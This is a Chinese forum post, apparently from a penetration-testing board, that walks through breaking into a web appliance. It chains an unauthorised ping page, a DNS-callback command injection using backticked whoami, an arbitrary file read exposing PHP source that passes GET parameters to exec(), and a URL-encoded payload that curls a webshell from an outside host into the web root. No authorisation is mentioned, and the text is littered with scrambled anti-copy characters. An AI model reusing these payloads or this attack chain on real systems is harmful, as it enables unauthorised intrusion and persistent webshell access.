中国网络渗透测试联盟

标题: Web安全之实战通过os命令注入漏洞getwebshell [打印本页]

---

作者: admin    时间: 2022-3-31 01:39
标题: Web安全之实战通过os命令注入漏洞getwebshell
[md]**一、
** **寻找突破口**
% W' }8 U+ X3 p2 @+ R4 V: F0 `
**经过右键查看源代码发现系统的特征为：images/select_bg.png，去钟馗之眼搜索如图：**

( [" u$ H! L# J( z% J, u


**发现reporter和[Technology,
Inc.](https://www.zoomeye.org/searchRe ... title:%22Technology,%20Inc.%22&t=all)都采用这个特征，然后一看之前搞过这样的系统，有源代码，对照源代码目录发现了未授权访问页面。**
) w5 R6 t# E' D& l! M
**地址为：**

[http://1.1.1.1//view/systemConfi ... ;text_packetsize=64](http://1.1.1.1/view/systemConfig ... ;text_packetsize=64)**，如图：**
% K8 R) q8 b+ Y) D3 J) B
9 B! z5 {; A# c# h
9 g9 C5 ~4 d  N$ L1 u( p) z


**测试ping这里的功能，发现可以绕过ping正常功能执行命令，payload为：**
: @8 |% @! q( F/ V
**`whoami`.1111.ceye.io** **，如图：**

( o! x: G% K1 o: U! p" w


**返回dns记录如图：**
: }3 G, p+ h2 K
. L4 @$ i1 m- k* n2 u
# v" Q! w' V6 \& s  \0 L$ f

- j3 n& @  g  s: W+ N! T& z**发现当前用户权限为root**
* d2 P# G/ D( |6 P! r  ~/ a
' z0 u; e: }5 M' l# s0 b& p**一、
; y* g; c- r* O0 z! _** **通过漏洞组合getwebshell**
- \  l0 y. j! Z: W4 V
* y7 C& L0 i  D/ {. P/ i. o**    ** **文章就按照挖洞顺序往下写，紧接着执行pwd命令获取web路径，如图：**

1 Q3 Q! _% g8 a; A5 B1 x) e) }: E
9 Q& S! q  B3 I1 D8 [

7 I% g1 ^; I; ?% f% ~: `5 j
**得知网站路径为：/var/www/html/view/systemconfig/systemtool/**
+ [! |- D) n3 B! O
**正好利用burpsuite发现一处os命令注入漏洞与一处任意文件查看漏洞，如下图为任意文件查看漏洞截图**
4 q, l% t: L0 b

**Os** **命令注入存的处为：/var/www/html/view/Behavior/toQuery.php，这个路径是通过第一步绕过ping命令正常功能执行命令漏洞获取到的，通过任意文件查看漏洞，我们读取一下源代码**

\

/ R- Z; j: j! Y" F/ e
' p  S7 x, G+ x**源代码为：**

<?php
include_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");
?>

<?php
# f9 f6 K9 J5 v2 c8 c
( L( S1 i7 L' F5 W9 i2 e

session_start ();

8 t% S2 F6 Z- I) f3 l3 g
; F3 d$ S& Q9 c* l

7 s' y! K  O7 F


/ h( V3 E8 i8 k0 {if ($_GET ["objClass"] == "")

9 ~* F' [( [. I+ E% k
7 ^" ~: M$ @6 S7 }. M
      exit ();
" _' j$ }* E1 f/ v
5 u2 Z! F* ^# F0 e. B
1 ], t( S/ x* L! ]8 M" B$ @$ K
0 B4 q) {* u* c0 a* \" K# x$param = $_REQUEST;


9 ^) X1 a+ o; i( K
9 K! L) \/ w6 a7 O+ q3 L
* ^1 I, r4 \1 Z3 Y4 H+ n
. N% M6 t, k* }" {$ E/ N* o/ g& Y, {
; i2 M- y: |( Q: M: q( R% ^# j2 d
: M) r: R2 l+ a$ l, Y//echo "\n--------------------------\n";
$ L6 ^9 [% ^! b' R0 O# o2 C$ N
  m' C, B( E; G1 [
/ ]+ c# ]9 Q+ P: H' d
2 @7 }# J; \: F; I* f  S, w1 H; G2 d//print_r($param);
2 a( e' C  X, O4 G- }( O/ x

4 p. I0 w. Q# g+ ]
//echo "\n--------------------------\n";



/ o$ L, z" w) w" Y  v1 C[if ($_GET ["method"] ==
- n+ E- H' D6 W  f"getList" || $_GET ["method"] == "import" ||
$ \" X, \: i) T- v/ L6 l, O$_GET ["method"] == "processAlarm") ](){
5 M: }* ~7 A; R7 T
) V# B8 {2 z, M2 t% W  V2 t$ ?( x. o
' ^! r& S/ T8 X
: D9 i! [" w( i+ O% Z      $param
& V! k2 f# V6 K7 n["user"] = $_SESSION ["s_userName"];

' n3 d: P6 I6 {6 a. [
8 A% @8 }- o1 D8 ?& g
      $param
$ P8 x3 ~) ^  n["lan"] = $_SESSION ["lan"];

4 [# R: D: E" C1 ^0 c

, u4 d" q9 t! }/ p; g8 A      $param
# Y, a" O3 S7 A! }) @["regUserpath"] = $_SESSION ["regUserpath"];
* o& |. a' B" G' E7 q# l. `
1 {  w$ h+ X) F4 J" h

/ k8 `# }( n3 k0 ?4 L   

/ j4 W% A% m  s0 J2 B9 h  A) R

8 a" u% \( v9 l      exec (
"rm -rf /tmp/cache" );

6 P+ w0 j/ y7 L1 G) Y
! c  h: \% a* z. f  D8 }3 G& e! v
      [$cmd = "/usr/local/php/bin/php ".$_SERVER
) o4 p1 R4 D$ s. A["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";]()

3 J# }. l, t: P; I" A7 R
  B9 j( T9 `9 S- m+ M7 \
0 A3 _3 N+ s) B9 z      $cmd .=
" " . $_GET ["objClass"];
* R) |- D2 t3 A% l0 o; M
; k# H  F1 M/ P7 f1 b3 u

3 P& _. L1 F2 t# L2 j6 x5 _      $cmd .=
" " . $_GET ["method"];


+ ~. @0 K3 b+ `( h5 x2 t# p
5 `' R0 [/ k  e) L8 l; z      $cmd .=
" " . base64_encode ( json_encode ( $param ) );

7 q# K- @$ V- C; Q
4 J$ ~. o2 t) d7 V$ r
      [file_put_contents("/tmp/query_cmd",$cmd);]()
" y7 j/ _$ x3 {; d6 d

1 [& z. H. o. K" u. @. U) o
8 |  X1 B) s" D( M( S      exec ( $cmd . "
9 ?+ o  d5 T4 Q$ B1 S> /dev/null &" );


- q' e6 e$ X1 d( Q4 G
  b8 t$ ?) }6 }- B3 f# N0 _
6 M; w: h+ i% X4 P9 @+ z9 `9 G
} else {
' R* C: \  ]0 V0 R" j

( s; F0 M+ E; c; d* S$ u9 t
0 K1 I* b2 ?' x* d6 T+ C      require_once
2 U" g( H% X3 J* t! V. P($_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");
3 b8 m0 h: t/ N$ s! i* X1 @1 B


' R! J4 O% j  k      $obj = new
QueryInterface ();
' ]# r" b, C1 S; R% w

2 ^; F0 u" I3 \
2 _5 ^/ _$ w' Z$ `      $instance =
$obj->getInstance ();
, u) n6 a! D. Z! W


3 u$ L6 D/ H8 s  ]      $instance->invokeMethod
9 Z  J0 X7 ^. K1 D, a( $_GET ["objClass"], $_GET ["method"], $param );

6 y$ T) R2 z( E  W
0 `5 |& N+ K' Q$ L
}

* d3 g' w* \; D2 U/ |
9 \  L& p8 \  o9 d3 t( J. O
exit ();



?>

4 |' }. W. I7 ?9 U**经常简单审计发现if ($_GET
! E+ f3 X) F$ Z& U  T: G["method"] == "getList" || $_GET ["method"] ==
$ g  A  `) Z7 @! h"import" || $_GET ["method"] == "[processAlarm]()")，如果method只要等于getList、import、processAlarm这其中一个，$cmd =
6 _3 t" _7 S1 k1 b"/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] .
4 {& P5 E# S4 c1 }"[system/behavior/behavior_query.php]()";  cmd等于web绝对路径+ system/behavior/behavior_query.php，然后file_put_contents("/tmp/query_cmd",$cmd);**

% [% `; n1 h( }9 h; W' P**      exec ( $cmd
; Z/ {4 O0 U, a, c8 y# \. "  > /dev/null &" );** **给我们构造了一个命令注入的参数，这里直接造成了OS命令注入漏洞，下面看我演示**



4 k) Y% F% [7 z1 B: Y4 h- n

: a; ], W7 \3 b' }) z- n, i2 x**图中objClass=存在OS命令注入漏洞，我之前试图通过bash反弹shell，但是测试了一晚上没反弹成功，最后选择了curl下载webshell，payload如下：**
0 a* c) K7 _/ \9 i- a2 ?
* G8 X2 {1 N% r6 j4 m8 u**%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php**

**我们用url解码如下：**
3 o2 h/ O& e( I& w+ Y& r
**|curl http://1.1.1.1/qYCwxRz1.zip -o
/var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o
/var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl ** [**http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php**](http://8.136.218.186/qYCwxRz1.zi ... l/images/suiji2.php)

* e8 T2 D* S' O. r. }**使用这么多管道符|就是要闭合payload，最后成功curl下载webshell如图：**


+ ]" o' p4 r5 r7 n) {

3 W9 Q( f3 e( v" r! M

# ]- ^% ?! a3 H) I**三、总结**
# P& |, r5 ]! V0 T! d1 d( w) ~
**   ** **案例之所以最终获得webshell，很大程度上是取决于几个漏洞的组合，首先通过右键查看源代码找到目标系统使用的系统，因为之前测试过与目标类似的程序。然后“对症下药”找到了ping未授权访问页面，通过绕过ping命令正常功能执行pwd命令获取到网站绝对路径，其次，使用任意文件查看漏洞去读取疑似存在os命令执行漏洞的php进行简单审计，经过确认存在此漏洞，最后构造os命令执行payload，最终getwebshell，整个getwebshell过程就是一个漏洞的连环组合，渗透更多的时候是靠运气，如果这几个环节有一个环节漏洞不存在或者没挖到，可能导致getwebshell失败。**
; m! q1 E: N! I5 C( r$ k; K
8 F! n& S! D7 b4 O8 B  R/ E**   ** **综上所述，运气与挖洞功底同等重要，谢谢观看** **！ **
[/md]

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2